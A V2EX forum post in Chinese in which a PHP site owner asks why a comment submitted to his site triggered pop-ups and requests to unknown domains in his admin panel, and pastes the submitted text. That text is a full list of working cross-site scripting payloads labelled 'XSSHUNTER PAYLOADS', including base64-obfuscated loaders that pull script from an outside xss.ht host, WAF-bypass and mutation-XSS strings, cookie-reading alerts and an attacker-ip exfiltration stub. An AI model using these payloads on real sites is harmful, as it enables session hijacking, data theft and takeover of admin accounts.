自写的 php 英文站,评论有人提交这个代码,经过 htmlspecialchars 保存在数据表,今天点开后台评论管理页面,就一直弹 1,弹域名这些,并且发送了一些请求到乱七八糟的域名,本地断网测试一番又没发现问题,请大家看看有什么问题?
XSSHUNTER PAYLOADS "><script src=
https://0xrohadi.xss.ht></script> javascript:eval('var a=document.createElement(\'script\');a.src=\'
https://0xrohadi.xss.ht\';document.body.appendChild(a)') "><input onfocus=eval(atob(
this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHhyb2hhZGkueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus> "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHhyb2hhZGkueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(
this.id))> "><video><source onerror=eval(atob(
this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHhyb2hhZGkueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==> "><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://
0xrohadi.xss.ht";parent.document.body.appendChild(a);</script>"> <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//
0xrohadi.xss.ht");a.send();</script> "><script>$.getScript("//
0xrohadi.xss.ht")</script> <audio controls onprogress=alert(1)> <source src=xss.mp3 type=audio/mpeg> </audio> <iframe><textarea></iframe><img src="" onerror="alert`1`"> xsstest'">{{7*7}} %22%3E%3Cbase%20href=%22https://
0xrohadi.xss.ht%22%3E <script%26gt Tanda kutip commbo %bf%27 "><svg><discard onbegin=alert(1)> Bypass WAF XSS path?p1=a%22><svg%20&p2=xxx&p3=a+onL0aD=confirm(document.domain)> <math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)"> <form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form> //ciao\"};prompt();/*var asd=[{\"foo\":\"bar "'>< + + <svg/onload=alert(document.domain)> %22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E <noscript><p title="</noscript><img src=x onerror=alert(document.cookie)>"> curl -i -s -k -X 'GET' \ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' \ '
https://app.box.com/' JSON XSS MODIFY HERE {"id":"abcabc\"><svg/onload=confirm(1)>abcabc","name":"file-name"} abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ”/><script>alert(1)</script>”/> >< ); alert(document.domain); if (1 ')-prompt('xss <img src=\"http://attacker-ip/?id= <svg></p><style><g title="</style><img src onerror=alert(document.domain)>"> \" onerror = \"alert(123)\" \" ';[confirm][document.domain];// " onmouseover="alert(1)" '/alert[/xss/]/' */confirm(1)/*
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
https://www.v2ex.com/t/764367
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.